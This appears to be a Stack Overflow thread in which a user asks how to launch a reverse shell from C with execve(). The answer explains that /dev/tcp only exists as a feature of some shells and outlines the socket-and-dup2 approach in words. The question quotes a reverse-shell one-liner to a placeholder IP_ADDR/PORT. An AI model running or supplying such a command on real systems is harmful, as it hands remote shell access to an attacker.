
I need to run a reverse shell using execve. I know how to run it from command line as follows:

$ /bin/sh -i > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1

I can run a simple version of /bin/sh call as follows:

#include <stdio.h>
#include <unistd.h>   /* declares execve() */

int main() {

   char *args[2];          /* two slots are declared... */
   args[0] = "/bin/sh";
   args[1] = "-i";
   args[2] = NULL;         /* ...but a third element is written here */

   execve(args[0], args, NULL);
}

I am not able to figure out how to run the rest of the command. I tried assigning the remaining string > /dev/tcp/IP_ADDR/PORT 0<&1 2>&1 as individual elements in the args array. When I run that, it reports "Can't open >".

Is the reverse shell command I mentioned executable via execve()? If so, what would be the right way to do it? Thanks.

Jake

1 Answer


The /dev/tcp/*/* files don't exist. They're an abstraction that only exists in some shells (bash, ksh). You'll need to do regular socket programming in your C program (socket, bind, listen, accept and then dup2 the socket on the standard IO descriptors of the shell you spawn).

You should also fix the overflow in the array. An initialization such as char *args[] = { "/bin/sh", "-i", 0 }; should be less error prone.

Petr Skocik
  • I did try with `/bin/bash`, but that didn't work either. – Jake Jul 04 '17 at 22:26
  • @Jake bash or ksh has to be the shell that interprets the path (not the program that gets directed to it). In your case, it's your program that would open the path but the path doesn't exist in the system. What bash/ksh do when they encounter such a path is they treat it as a magical string that tells them to do the standard BSD socket dance around IP_ADDR and PORT. Your program should skip the magical path stuff altogether and simply do the socket dance. – Petr Skocik Jul 04 '17 at 22:31